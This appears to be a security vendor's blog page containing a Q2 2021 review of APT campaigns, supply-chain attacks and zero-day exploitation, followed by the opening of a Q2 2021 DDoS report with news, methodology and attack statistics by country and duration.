While investigating a recent rise of attacks against Exchange servers, we noticed a recurring cluster of activity that appeared in several distinct compromised networks. This cluster stood out because it used a formerly unknown Windows kernel mode rootkit and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers. The former is used to hide the user mode malware’s artefacts from investigators and security solutions, while demonstrating an interesting loading scheme involving the kernel mode component of an open source project named “Cheat Engine” to bypass the Windows Driver Signature Enforcement mechanism. We were able to determine that this toolset had been in use from as early as July 2020; and that the threat actor was mostly focused on Southeast Asian targets, including several governmental entities and telecoms companies. Since this was a long-standing operation, with high-profile victims, an advanced toolset and no affinity to a known threat actor, we decided to name the underlying cluster “GhostEmperor”.

APT31 (aka ZIRCONIUM) is a Chinese-speaking intrusion set. This threat actor set up an ORB (Operational Relay Boxes) infrastructure, composed of several compromised SOHO routers, to target entities based in Europe (and perhaps elsewhere). As of the publication of our report in May, we had seen these ORBs used to relay Cobalt Strike communications and for anonymization proxying purposes. It is likely that APT31 uses them for other implants and ends as well (for example, exploit or malware staging). Most of the infrastructure put in place by APT31 comprises compromised Pakedge routers (RK1, RE1 and RE2). This little-known constructor specializes in small enterprise routers and network devices. So far, we don’t know which specific vulnerability has been exploited by the intrusion set to compromise the routers. Nor do we currently possess telemetry that would provide further visibility into this campaign. We will, of course, continue to track these activities.

Following our previous report on EdwardsPhesant, DomainTools and BitDefender published articles about malicious activities against targets in Southeast Asia which we believe, with medium to high confidence, are parts of EdwardsPhesent campaigns. While tracking the activities of this threat actor, analyzing samples discovered or provided by third parties, and investigating from public IoCs, we discovered an updated DropPhone implant, an additional implant loaded by FoundCore’s shellcode, several possible new infection documents and malicious domain names, as well as additional targets. While we do not believe we have a complete picture of this set of activities yet, our report this quarter marks a significant step further in understanding its extent.

A Chinese-speaking APT related to activity known as “new ControllX” compromised a certificate authority in Mongolia and replaced digital certificate management client software with a malicious downloader in February. We are tracking this group as BountyGlad. Related infrastructure was identified and used in multiple other incidents: interesting related activity included server-side attacks on WebSphere and WebLogic services in Hong Kong; and on the client-side, Trojanized Flash Player installers. The group demonstrated an increase in strategic sophistication with this supply-chain attack. While replacing a legitimate installer on a high value website like a certificate authority requires a medium level of skill and coordination, the technical sophistication is not on par with ShadowHammer. And while the group deploys fairly interesting, but simplistic, steganography to cloak its shellcode, we think it was probably generated with code that has been publicly available for years. Previous activity also connected with this group relied heavily on spear-phishing and Cobalt Strike throughout 2020. Some activity involved PowerShell commands and loader variants different from the downloaders presented in our recent report. In addition to spear-phishing, the group appears to rely on publicly available exploits to penetrate unpatched target systems. They use implants and C2 (Command and Control) code that are a mix of both publicly available and privately shared across multiple Chinese-speaking APTs. We are able to connect infrastructure across multiple incidents. Some of those were focused on Western targets in 2020. Some of the infrastructure listed in an FBI Flash alert published in May 2020, targeting US organizations conducting COVID-19 research, was also used by BountyGlad.

While investigating users infected with the TPCon backdoor, previously discussed in a private report, we detected loaders which are part of a new multi-plugin malware framework that we named “QSC”, which allows attackers to load and run plugins in-memory. We attribute the use of this framework to Chinese-speaking groups, based on some overlaps in victimology and infrastructure with other known tools used by these groups. We have so far observed the malware loading a Command shell and File Manager plugins in-memory. We believe the framework has been used in the wild since April 2020, based on the compilation timestamp of the oldest sample found. However, our telemetry suggests that the framework is still in use: the latest activity we detected was in March this year.

Earlier this month, Rostelecom Solar and NCIRCC issued a joint public report describing a series of attacks against networks of government entities in Russia. The report described a formerly unknown actor leveraging an infection chain that leads to the deployment of two implants – WebDav-O and Mail-O. Those, in conjunction with other post-exploitation activity, have led to network-wide infections in the targeted organizations that resulted in exfiltration of sensitive data. We were able to trace the WebDav-O implant’s activity in our telemetry to at least 2018, indicating government affiliated targets based in Belarus. Based on our investigation, we were able to find additional variants of the malware and observe some of the commands executed by the attackers on the compromised machines.

We discovered a cluster of activity targeting telecom operators within a specific region. The bulk of this activity took place from May to October 2020. This activity made use of several malware families and tools; but the infrastructure, a staging directory, and in-country target profiles tie them together. The actors deployed a previously unknown passive backdoor, that we call “TPCon”, as a primary implant. It was later used to perform both reconnaissance within target organizations and to deploy a post-compromise toolset made up mostly of publicly available tools. We also found other previously unknown active backdoors, that we call “evsroin”, used as secondary implants. Another interesting find was a related loader (found in a staging directory) that loaded a KABA1 implant variant. KABA1 was an implant used against targets throughout the South China Sea that we attributed to the Naikon APT back in 2016. On another note, on the affected hosts we found additional multiple malware families shared by Chinese-speaking actors, such as ShadowPad and Quarian backdoors. These did not seem to be directly connected to the TPCon/evsroin incidents because the supporting infrastructure appeared to be completely separate. One of the ShadowPad samples appears to have been detected in 2020, while the others were detected well before that, in 2019. Besides the Naikon tie, we found some overlaps with previously reported IceFog and IamTheKing activities.

Middle East

BlackShadow is a threat group that became known after exfiltrating sensitive documents from Shirbit, an Israeli insurance company, and demanding a ransom in exchange for not releasing the information in its possession. Since then, the group has made more headlines, breaching another company in Israel and publishing a trove of documents containing customer related information on Telegram. Following this, we found several samples of the group’s unique .NET backdoor in our telemetry that were formerly unknown to us, one of which was recently detected in Saudi Arabia. By pivoting on new infrastructure indicators that we observed in those samples, we were able to find a particular C2 server that was contacted by a malicious Android implant and shows ties to the group’s activity.

We previously covered a WildPressure campaign against targets in the Middle East . Keeping track of the threat actor’s malware this spring, we were able to find a newer version (1.6.1) of their C++ Trojan, a corresponding VBScript variant with the same version and a completely new set of modules, including an orchestrator and three plugins. This confirms our previous assumption that there are more last-stagers besides the C++ ones, based on one of the fields in the C2 communication protocol which contains the “client” programming language. Another language used by WildPressure is Python. The PyInstaller module for Windows contains a script named “Guard”. Perhaps the most interesting finding here is that this malware was developed for both Windows and macOS operating systems. In this case, the hardcoded version is 2.2.1. The coding style, overall design and C2 communication protocol is quite recognisable across all programming languages used by the attackers. The malware used by WildPressure is still under active development in terms of versions and programming languages in use. Although we could not associate WildPressure’s activity with other threat actors, we did find minor similarities in the TTPs (Tactics, Techniques and Procedures) used by BlackShadow, which is also active in the same region. However, we consider that these similarities serve as minor ties and are not enough to make any attribution.

We discovered an ongoing campaign that we attribute to an actor named WIRTE, beginning in late 2019, targeting multiple sectors, focused on the Middle East. WIRTE is a lesser-known threat actor first publicly referenced in 2019, which we suspect has relations with the Gaza Cybergang threat actor group.  During our hunting efforts, in February, for threat actor groups that are using VBS/VBA implants, we came across MS Excel droppers that use hidden spreadsheets and VBA macros to drop their first stage implant – a VBS script. The VBS script’s main function is to collect system information and execute arbitrary code sent by the attackers. Although we recently reported on a new Muddywater first stage VBS implant used for reconnaissance and profiling activities, these intrusion sets have slightly different TTPs and wider targeting. To date, we have recorded victims focused in the Middle East and a few other countries outside this region. Despite various industries being affected, the focus was mainly towards government and diplomatic entities; however, we also noticed an unusual targeting of law firms.

GoldenJackal is the name we have given to a cluster of activity, recently discovered in our telemetry, that has been active since November 2019. This intrusion set consists of a set of .NET-based implants that are intended to control victim machines and exfiltrate certain files from them, suggesting that the actor’s primary motivation is espionage. Furthermore, the implants were found in a restricted set of machines associated with diplomatic entities in the Middle East. Analysis of the aforementioned malware, as well as the accompanied detection logs, portray a capable and moderately stealthy actor. This can be substantiated by the successful foothold gained by the underlying actor in the few organizations we came across, all the while keeping a low signature and ambiguous footprint.

Southeast Asia and Korean Peninsula

The ScarCruft group is a geo-political motivated APT group that usually attacks government entities, diplomats and individuals associated with North Korean affairs. Following our last report about this group, we had not seen its activities for almost a year. However, we observed that ScarCruft compromised a North Korea-related news media website in January, beginning a campaign that was active until March. The attackers utilized the same exploit chains, CVE-2020-1380 and CVE-2020-0986, also used in Operation Powerfall. Based on the exploit code and infection scheme characteristics, we suspect that Operation PowerFall has a connection with the ScarCruft group. The exploit chain contains several stages of shellcode execution, finally deploying a Windows executable payload in memory. We discovered several victims from South Korea and Singapore. Besides this watering-hole attack, this group also used Windows executable malware concealing its payload. This malware, dubbed “ATTACK-SYSTEM”, also used multi-stage shellcode infection to deliver the same final payload named “BlueLight”. BlueLight uses OneDrive for C2. Historically, ScarCruft malware, especially RokRat, took advantage of personal cloud servers as C2 servers, such as pCloud, Box, Dropbox, and Yandex.

In May 2020, the Criminal Investigation Bureau (CIB) of Taiwan published an announcement about an attack targeting Taiwanese legislators. Based on their information, an unknown attacker sent spear-phishing emails using a fake presidential palace email account, delivering malware we dubbed “Palwan”. Palwan is malware capable of performing basic backdoor functionality as well as downloading further modules with additional capabilities. Analysing the malware, we discovered another campaign, active in parallel, targeting Nepal. We also found two more waves of attacks launched against Nepal in October 2020 and in January this year using Palwan malware variants. We suspect that the targeted sector in Nepal is similar to the one reported by the CIB of Taiwan. Investigating the infrastructure used in the Nepal campaigns, we spotted an overlap with Dropping Elephant activity. However, we don’t deem this overlap sufficient to attribute this activity to the Dropping Elephant threat actor.

BlueNoroff is a long-standing, financially motivated APT group that has been targeting the financial industry for years. In recent operations, the group has focused on cryptocurrency businesses. Since the publication of our research of BlueNoroff’s “SnatchCrypto” campaign in 2020, the group’s strategy to deliver malware has evolved. In this campaign, BlueNoroff used a malicious Word document exploiting CVE-2017-0199, a remote template injection vulnerability. The injected template contains a Visual Basic script, which is responsible for decoding the next payload from the initial Word document and injecting it into a legitimate process. The injected payload creates a persistent backdoor on the victim’s machine. We observed several types of backdoor. For further surveillance of the victim, the malware operator may also deploy additional tools. BlueNoroff has notably set up fake blockchain, or cryptocurrency-related, company websites for this campaign, to lure potential victims and initiate the infection process. Numerous decoy documents were used, which contain business and nondisclosure agreements as well as business introductions. When compared to the previous SnatchCrypto campaign, the BlueNoroff group utilized a similar backdoor and PowerShell agent but changed the initial infection vector. Windows shortcut files attached to spear-phishing emails used to be the starting point for an infection: they have now been replaced by weaponized Word documents.

We have discovered Andariel activity using a revised infection scheme and custom ransomware targeting a broad spectrum of industries located in South Korea. In April, we observed a suspicious document containing a Korean file name and decoy uploaded to VirusTotal. It revealed a novel infection scheme and an unfamiliar payload. During the course of our research, Malwarebytes published a report with technical details about the same series of attacks, which attributed it to the Lazarus group. After a deep analysis we reached a different conclusion – that the Andariel group was behind these attacks. Code overlaps between the second stage payload in this campaign and previous malware from the Andariel group allowed for this attribution. Apart from the code similarity and the victimology, we found additional connections with the Andariel group. Each threat actor has a characteristic habit when they interactively work with a backdoor shell in the post-exploitation phase. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity. The threat actor has been spreading the third stage payload since the middle of 2020 and leveraged malicious Word documents and files mimicking PDF documents as infection vectors. Notably, in addition to the final backdoor, we discovered one victim infected with custom ransomware. This ransomware adds another facet to this Andariel campaign, which also sought financial profit in a previous operation involving the compromise of ATMs.

We recently uncovered a large-scale and highly active attack in Southeast Asia coming from a threat actor we dubbed LuminousMoth. Further analysis revealed that this malicious activity dates back to October 2020 and was still ongoing at the time we reported it in June. LuminousMoth takes advantage of DLL sideloading to download and execute a Cobalt Strike payload. However, perhaps the most interesting part of this attack is its capability to spread to other hosts by infecting USB drives. In addition to the malicious DLLs, the attackers also deployed a signed, but fake version of the popular application Zoom on some infected systems, enabling them to exfiltrate files; and an additional tool that accesses a victim’s Gmail session by stealing cookies from the Chrome browser. Infrastructure ties as well as shared TTPs allude to a possible connection between LuminousMoth and the HoneyMyte threat group, which was seen targeting the same region and using similar tools in the past. Most early sightings of this activity were in Myanmar, but it now appears that the attackers are much more active in the Philippines, where the number of known attacks has grown more than tenfold. This raises the question of whether this is caused by a rapid replication through removable devices or by an unknown infection vector, such as a watering-hole focusing on the Philippines.

We recently reported SideCopy campaigns attacking the Windows platform together with Android-based implants. These implants turned out to be multiple applications working as information stealers to collect sensitive information from victims’ devices, such as contact lists, SMS messages, call recordings, media and other types of data. Following up, we discovered additional malicious Android applications, some of them purporting to be known messaging apps like Signal or an adult chat platform. These newly discovered applications use the Firebase messaging service as a channel to receive commands. The operator is able to control if either Dropbox or another, hard coded server is used to exfiltrate stolen files.

Other interesting discoveries

Expanding our research on the exploit targeting CVE-2021-1732, originally discovered by DBAPPSecurity Threat Intelligence Center and used by the Bitter APT group, we discovered another possible zero-day exploit used in the Asia-Pacific (APAC) region. Interestingly, the exploit was found in the wild as part of a separate framework, alongside CVE-2021-1732 as well as other previously patched exploits. We are highly confident that this framework is entirely unrelated to Bitter APT and was used by a different threat actor. Further analysis revealed that this Escalation of Privilege (EoP) exploit has potentially been used in the wild since at least November 2020. Upon discovery, we reported this new exploit to Microsoft in February. After confirmation that we were indeed dealing with a new zero-day, it received the designation CVE-2021-28310.

Various marks and artifacts left in the exploit mean that we are also highly confident that CVE-2021-1732 and CVE-2021-28310 were created by the same exploit developer that we track as “Moses”. “Moses” appears to be an exploit developer who makes exploits available to several threat actors, based on other past exploits and the actors observed using them. To date, we have confirmed that at least two known threat actors have utilized exploits originally developed by Moses: Bitter APT and Dark Hotel. Based on similar marks and artifacts, as well as privately obtained information from third parties, we believe at least six vulnerabilities observed in the wild in the last two years have originated from “Moses”. While the EoP exploit was discovered in the wild, we are currently unable to directly tie its usage to any known threat actor that we are currently tracking. The EoP exploit was probably chained together with other browser exploits to escape sandboxes and obtain system level privileges for further access. Unfortunately, we weren’t able to capture a full exploit chain, so we don’t know if the exploit is used with another browser zero-day, or coupled with exploits taking advantage of known, patched vulnerabilities.

In another, more recent investigation into the surge of attacks by APT actors against Exchange servers following the revelation of ProxyLogon and other Exchange vulnerabilities, we took note of one unique cluster of activity. It attracted our attention because the actor behind it seemed to have been active in compromising Exchange servers since at least December 2020, all the while using a toolset that we were not able to associate with any known threat group. During March, several waves of attacks on Exchange servers were made public, partially describing the same cluster of activity that we had observed. One of them, reported by ESET, contained an assessment that the actor behind this activity had access to the Exchange exploits prior to their public release, which aligns with our observations of the early activity of it last year. That said, none of the public accounts described sightings of the full infection chain and later stages of malware deployed as part of this group’s operation. Adopting the name Websiic, given publicly to this cluster of activity by ESET, we reported the TTPs of the underlying threat actor. Namely, we focused on the usage of both commodity tools like the China Chopper webshell and a proprietary .NET backdoor used by the group, which we dubbed “Samurai”, as well as describing a broader set of targets than the one documented thus far.

On 15 April, Codecov publicly disclosed that its Bash Uploader script had been compromised and was distributed to users between the 31 January and the 1 April. The Bash Uploader script is publicly distributed by Codecov and aims to gather information on the user’s execution environments, collect code coverage reports, and send them to the Codecov infrastructure. As a result, this script compromise effectively constitutes a supply-chain attack. The Bash uploader script is typically executed as a trusted resource in development and testing environments (including as part of automated build processes, such as continuous integration or development pipelines); and its compromise could enable malicious access to infrastructure or account secrets, as well as code repositories and source code. While we haven’t been able to confirm the malicious script deployment, retrieve any information on the compromise goals, or identify further associated malicious tools yet, we were able to collect one sample of a compromised Bash uploader script, as well as identify some possibly associated additional malicious servers.

An e-mail sent by Click Studios to its customers on 22 April informed them that a sophisticated threat actor had gained access to the Passwordstate automatic updating functionality, referred to as the in-place upgrade. Passwordstate is a password management tool for enterprises, and on 20 April, for a period of about 28 hours, a malicious DLL was included in the software updates. On 24 April, an incident management advisory was also released. The purpose of the campaign was to steal passwords stored in the password manager. Although this attack was only active for a short time, we managed to obtain the malicious DLLs and reported our initial findings. Nevertheless, it’s still unclear how the attackers gained access to the Passwordstate software to begin with. Following a new advisory published by Click Studio on 28 April, we discovered a new variant of the malicious DLL used to backdoor the Passwordstate password manager. This DLL variant was distributed in a phishing campaign, most likely by the same actor.

A few days after April’s Patch Tuesday updates from Microsoft (13 April), a number of suspicious files caught our attention. These files were binaries, disguised as “April 2021 Security Update Installers”. They were signed with a valid digital signature, delivering Cobalt Strike beacon modules. It is likely that the modules were signed with a stolen digital certificate. These Cobalt Strike beacon implants were configured with a hardcoded C2, “code.microsoft.com”. Contrary to a (now redacted) publication from the Qihoo 360 team revolving around this activity, we can confirm that there was no compromise of Microsoft’s infrastructure. In fact, an unauthorized party took over the dangling subdomain “code.microsoft.com” and configured it to resolve to their Cobalt Strike host, setup around 15 April. That domain hosted a Cobalt Strike beacon payload served to HTTP clients using a specific and unique user agent. According to Microsoft and the initial Qihoo notification, the impact in this case was very limited and didn’t affect unsuspecting visitors to this website because of the required unique user agent.

On April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. While we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web-browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. The EoP exploit was fine-tuned to work against the latest and the most prominent builds of Windows 10 (17763 – RS5, 18362 – 19H1, 18363 – 19H2, 19041 – 20H1, 19042 – 20H2) and it exploits two distinct vulnerabilities in the Microsoft Windows OS kernel. On April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as a part of the June Patch Tuesday. The exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a “remote shell”-style backdoor which in turns connects to the C2 to get commands. So far, we haven’t been able to find any connections or overlaps with a known actor. Therefore, we are tentatively calling this cluster of activity PuzzleMaker.

On April 16, we began hearing rumors about active exploitation of Pulse Secure devices from other researchers in the community. One day prior to this, the NSA, CISA, and FBI had jointly published an advisory stating that APT29 was conducting widespread scanning and exploitation of vulnerable systems, including Pulse Secure. For this reason, initial thoughts were that the two were related; and these were just rumors circulating the community about old activity that was being brought to light again. Following this, we were able to at least confirm that the initial rumors were part of a separate set of activities that had occurred between January and March and were not directly related to the advisory mentioned above. This new activity involved the exploitation of at least two vulnerabilities in Pulse Secure; one previously patched and one zero-day (CVE-2021-22893). We also became aware of affected organizations that were notified by a third party that they were potentially compromised by this activity. After exploitation, the threat actor proceeded to deploy a simple webshell to maintain persistence. On May 3, Pulse Secure delivered “out-of-cycle” update and workaround packages to provide a solution for the multiple vulnerabilities.

Cooperating with Check Point Research, we discovered an ongoing attack targeting a small group of individuals in Xinjiang and Pakistan, in regions mostly populated by the Uyghur minority. The attackers used malicious executables that collect information about the infected system and attempt to download a second-stage payload. The actor put considerable effort into disguising the payloads, whether by creating delivery documents that appear to be originating from the United Nations using up-to-date related themes, or by setting up websites for non-existing organizations claiming to fund charity groups. In our report, we examined the flow of both infection vectors and provided our analysis of the malicious artifacts we came across during this investigation, even though we were unable to obtain the later stages of the infection chain.

Final thoughts

While the TTPs of some threat actors remain consistent over time, relying heavily on social engineering as a means of gaining a foothold in a target organisation or compromising an individual’s device, others refresh their toolsets and extend the scope of their activities. Our regular quarterly reviews are intended to highlight the key developments of APT groups.

Here are the main trends that we’ve seen in Q2 2021:

  • We have reported several supply-chain attacks in recent months.. While some were major and have attracted worldwide attention, we observed equally successful low-tech attacks, such as BountyGlad, CoughingDown and the attack targeting Codecov.
  • APT groups mainly use social engineering to gain an initial foothold in a target network. However, we’ve seen a rise in APT threat actors leveraging exploits to gain that initial foothold – including the zero-days developed by the exploit developer we call “Moses” and those used in the PuzzleMaker, Pulse Secure attacks and the Exchange server vulnerabilities.
  • APT threat actors typically refresh and update their toolsets: this includes not only the inclusion of new platforms but also the use of additional languages as seen by WildPressure’s macOS-supported Python malware.
  • As illustrated by the campaigns of various threat actors – including BountyGlad, HotCousin, GoldenJackal, Scarcruft, Palwan, Pulse Secure and the threat actor behind the WebDav-O/Mail-O implants – geo-politics continues to drive APT developments.

As always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.

2021. július 28.

DDoS attacks in Q2 2021

News overview

In terms of big news, Q2 2021 was relatively calm, but not completely eventless. For example, April saw the active distribution of a new DDoS botnet called Simps — the name under which it introduced itself to owners of infected devices. The malware creators promoted their brainchild on a specially set-up YouTube channel and Discord server, where they discussed DDoS attacks. The actual DDoS functionality of Simps is not original: the code overlaps with the Mirai and Gafgyt botnets.

That said, nor does Gafgyt rely on originality: a handful of modules in the new variants (detected by Uptycs) were all borrowed from Mirai, the most widespread botnet. In particular, Gafgyt’s authors copied its implementation of various DDoS methods, such as TCP, UDP and HTTP flooding, as well as its brute-force functionality for hacking IoT devices via the Telnet protocol.

Mirai’s code formed the basis of the ZHtrap botnet, which became known this quarter. This malware is of interest for its use of infected devices as honeypots. ZHtrap first collects the IP addresses of devices that attack the trap, and then attempts to attack these devices itself.

Lately cybercriminals have been actively seeking out new services and protocols for amplifying DDoS attacks. Q2 2021 was no exception: in early July researchers at Netscout reported an increase in attacks using the Session Traversal Utilities for NAT (STUN) protocol. This protocol is used to map internal IP addresses and ports of hosts hidden behind NAT to external ones. Using it, attackers were able to increase the volume of junk traffic by a factor of just 2.32, but in combination with other attack vectors, the DDoS power reached 2TB/s. In addition, hijacking STUN servers to be used as reflectors can disable their main functionality. The organizations that use STUN would be wise to make sure their servers are protected against such attacks. At the time of posting, there were more than 75,000 vulnerable servers worldwide.

Another new DDoS vector has yet to be harnessed by cybercriminals. It is linked to a vulnerability in DNS resolvers that allows amplification attacks on authoritative DNS servers. The bug was named TsuNAME. It works as follows: if a configuration error causes the DNS records of certain domains to point to each other, the resolver will endlessly forward the request from one domain to another, significantly increasing the load on their DNS servers. Such errors can occur by accident: in early 2020, two misconfigured domains caused a 50% increase in the traffic flow on authoritative DNS servers in the NZ domain zone, and a similar incident in a European domain zone led to a tenfold rise in traffic. If an attacker were to create multiple domains pointing to each other, the scale of the problem would be considerably greater.

Attacks on DNS servers are dangerous because all the resources they serve become unavailable, regardless of their size and level of DDoS protection. This is well illustrated by the attack on DNS provider Dyn that downed more than 80 major websites and online services in 2016. To prevent the TsuNAME vulnerability from having the same devastating consequences, the researchers recommend owners of authoritative servers to regularly identify and fix such configuration errors in their domain zone, and owners of DNS resolvers to ensure detection and caching of looped requests.

It was a DNS flood in early April that disrupted the operation of Xbox Live, Microsoft Teams, OneDrive and other Microsoft cloud services. Although the Azure DNS service, which handles the domain names of most of the services, has mechanisms to protect against junk traffic, an unnamed coding error meant it could not cope with the flow of requests. The situation was aggravated by legitimate users trying in vain to access the unresponsive services. However, Microsoft fixed the bug fairly quickly, and the services were soon up and running again.

One other large-scale DDoS attack swept through Belgium, hitting Belnet and other ISPs. Users across the country experienced service interruptions, and websites in the BE domain zone were temporarily unavailable. Junk traffic was sent from IP addresses in 29 countries worldwide, and, as Belnet noted, the attackers kept changing tactics, making the attack extremely difficult to stop. It forced the Belgian parliament to postpone several sessions, while educational institutions had problems with distance learning, and the transport company STIB likewise with the sale of tickets. Online registration systems for COVID-19 vaccinations were also affected.

The council of Grenoble-Alpes Métropole in France also had to suspend a session for several hours. A DDoS attack involving about 60,000 bots made it impossible to broadcast the event live.

Besides Belnet, several other European ISPs were targeted by DDoS attacks. For example, Ireland’s Nova fell victim to cybervillains. No confidential data was affected, a spokesperson said, adding that “we are the latest Irish ISP to be attacked and we won’t be the last, as the criminals cycle through Irish networks one by one.”

That said, there is no need to direct junk traffic at ISPs’ own resources in order to disrupt their networks. For instance, Zzoomm, a British broadband provider, suffered from a DDoS assault on one of its upstream suppliers, which in turn was not the real target: cybercriminals were trying to extort a ransom from one of its customers.

In general, DDoS ransomware attacks continued to gain momentum. A cybercriminal group known for its fondness of masquerading as various APT outfits again made the news, this time under the fictitious moniker Fancy Lazarus, composed of the names of two groups: Lazarus and Fancy Bear. Although cybercriminals attack organizations the world over, the victims of Fancy Lazarus were predominantly in the US, and the size of the ransom was lowered from 10–20 to 2 BTC.

Avaddon ransomware operators also tried to intimidate victims through DDoS attacks. In early May, they flooded the site of Australian company Schepisi Communications with junk traffic. The organization partners Telstra, a major Australian provider, selling SIM cards and cloud services on the latter’s behalf. Later that same month, French insurance company AXA, one of the largest in the field, also fell victim to Avaddon. As in the case of Schepisi Communications, besides encrypting and stealing data from several of its branches, the cybercriminals carried out a DDoS attack on its websites. After a string of devastating attacks in June, the ransomware creators announced its retirement.

In May, the Irish Health Service Executive (HSE) was hit by DDoS. The attacks would have been unremarkable had they not been immediately followed by an invasion of Conti ransomware. Whether these events are related is uncertain, but the ransomwarers could have used DDoS as a cover to penetrate the company’s network and steal data.

Attacks on educational institutions continued in Q2, occurring as they do throughout the school year. For example, malicious actors forced Agawam Public Schools in Massachusetts to shut down their guest network to protect the main network. This meant that Internet access was available only on school-issued devices.

Nor did video games escape attention this reporting period. The Titanfall and Titanfall 2 servers suffered DDoS-related outages in April and May. At least some of these attacks may have targeted specific streamers. To protect against attackers, enthusiasts created a mod that hides players’ names. However, this did not stop the attacks on the game servers. As for the developer, Respawn Entertainment, it took care of DDoS protection, but not in Titanfall, rather in Apex Legends, where the new version, in the event of an attack, chucks everyone out of the game, with compensation for any losses incurred. Back in Titanfall, however, the problem is so acute that a hacktivist player decided to hack Apex Legends to raise awareness of it.

Another hacktivist, after a decade of hiding from the law, was caught in Mexico and deported to the US. Christopher Doyon had been one of the organizers of the 2010 protests against a law banning rough sleeping in Santa Cruz, California. Following the crackdown on the protests, Doyon launched a DDoS attack on the Santa Cruz County website. Having been charged, the hacktivist failed to appear at a court hearing pending trial in 2012. Consequently, he was put on the international wanted list. Now Doyon will finally stand trial on the decade-old charges.

Quarter trends

As expected, Q2 2021 was calm. We recorded a slight fall in the total number of DDoS attacks compared to the previous quarter, which is typical for this period and seen every year, barring the anomalous 2020. This drop we traditionally associate with the start of the vacation period. It tends to continue through Q3, and we expect no change this year.

Comparative number of DDoS attacks, Q1 and Q2 2021, and Q2 2020. Q2 2020 data is taken as 100% (download)

Note the exceptional duration of smart DDoS attacks in the past quarter. This is due to several abnormally long, though not too powerful, attacks on law enforcement resources. We see no correlation between these attacks and any high-profile event. There may be a causal connection somewhere, but since there is no way of knowing, it remains to interpret them as statistical anomalies, which do crop up every so often. With these attacks excluded from the sample, the data on DDoS duration is closer to the norm with different periods fluctuating by no more than 30% relative to each other.

DDoS attack duration, Q1 and Q2 2021, and Q2 2020. Q2 2020 data is taken as 100% (download)

Statistics Methodology

Kaspersky has a long history of combating cyber threats, including DDoS attacks of all types and complexity. The company experts monitor botnets using the Kaspersky DDoS Intelligence system.

As part of the Kaspersky DDoS Protection solution, DDoS Intelligence intercepts and analyzes commands sent to bots from C&C servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q2 2021.

In the context of this report, an incident is counted as a single DDoS attack only if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, this is considered as two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.

The geographical locations of DDoS victims and C&C servers are determined by their IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky. Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.

Quarter summary
  • Q2’s leader by number of DDoS attacks is again the US (36%). The share of China (10.28%) continued to fall, while Poland (6.34%) climbed into the TOP 3 most attacked countries.
  • The most DDoS-active day in the quarter was June 2, when we registered 1,164 attacks. On the quietest day, we observed only 60 DDoS attacks.
  • Most DDoS attacks occurred on Tuesdays (15.31%), while the calmest day of the week was Sunday (13.26%).
  • The longest DDoS attack lasted 776 hours (more than 32 days).
  • UDP flooding was used in 60% of DDoS attacks.
  • The country with the most botnet C&C servers was the US (47.95%), while the bulk of bots attacking IoT devices in order to assimilate them were located in China.
DDoS attack geography

In Q2 2021, as in Q1, most DDoS attacks were directed at US-based resources (36%). China (10.28%), the perennial leader until this year, continued to lose ground, shedding another 6.36 p.p. Third place this quarter was taken by a newcomer in the ranking, Poland (6.34%), whose share was up by 4.33 p.p. against the previous reporting period. Canada (5.23%), which rounded out the TOP 3 in Q1, fell to fifth place, despite gaining 0.29 p.p.

In fourth place by number of DDoS attacks in Q2 was Brazil (6.06%), whose share almost doubled. Sixth in the ranking was France (5.23%), behind Canada by a fraction of a fraction. Germany (4.55%) remained in seventh position, while the UK (3.82%) moved into eighth. At the foot of the ranking are the Netherlands (3.33%) and Hong Kong (2.46%), whose shares, like China’s, continued to nosedive.

Distribution of DDoS attacks by country, Q1 and Q2 2021 (download)

A look at the countries with the highest number of unique targets also shows an increase in DDoS activity in Poland (7.44%) and Brazil (6.25%), which ranked second and third, respectively, and a decrease in activity in China (5.99%), which dropped to fourth place. The TOP 10 tends to be pegged to the list of countries with the highest number of DDoS attacks: the US remains in top spot (38.60%), fifth to eighth places belong to France (4.97%), Germany (4.86%), the UK (4.40%) and Canada (4.20%), respectively, followed by the Netherlands (3.40%) and Hong Kong (1.81%).

Distribution of unique DDoS targets by country, Q1 and Q2 2021 (download)

Dynamics of the number of DDoS attacks

As noted above, Q2 turned out relatively calm. On average, the number of DDoS attacks per day fluctuated between 500 and 800. On the quietest day of the reporting period, April 18, we observed only 60 attacks. On two other days, June 24 and 25, the number of attacks fell short of 200. Nevertheless, Q2 had its share of turbulent days with more than 1,000 DDoS attacks. For instance, we observed 1,061 attacks on April 13 and 1,164 on June 2.

Dynamics of the number of DDoS attacks, Q2 2021 (download)

The distribution of DDoS attacks by day of the week in Q2 was, if anything, even more uniform than in Q1: the difference between the busiest and quietest days was only 2.05 p.p. At the same time, activity shifted to the start of the week. The share of Monday through Thursday relative to Q1 increased, while the end of the week, having been the most turbulent in the previous reporting period, grew calmer. We observed the highest number of attacks on Tuesdays (15.31%), while the quietest day this time was Sunday (13.26%).

Distribution of DDoS attacks by day of the week, Q1 and Q2 2021 (download)

Duration and types of DDoS attacks

In Q2, the average DDoS attack duration remained virtually unchanged from the previous reporting period: 3.18 hours versus 3.01 in Q1. What’s more, there was a slight increase both in the share of very short attacks lasting less than 4 hours (from 91.37% to 93.99%) and in the share of long (from 0.07% to 0.13%) and ultra-long (from 0.13% to 0.26%) ones. By contrast, the share of moderately long attacks in Q2 fell slightly, and attacks lasting 5–9 hours (2.65%) lost 1.51 p.p.

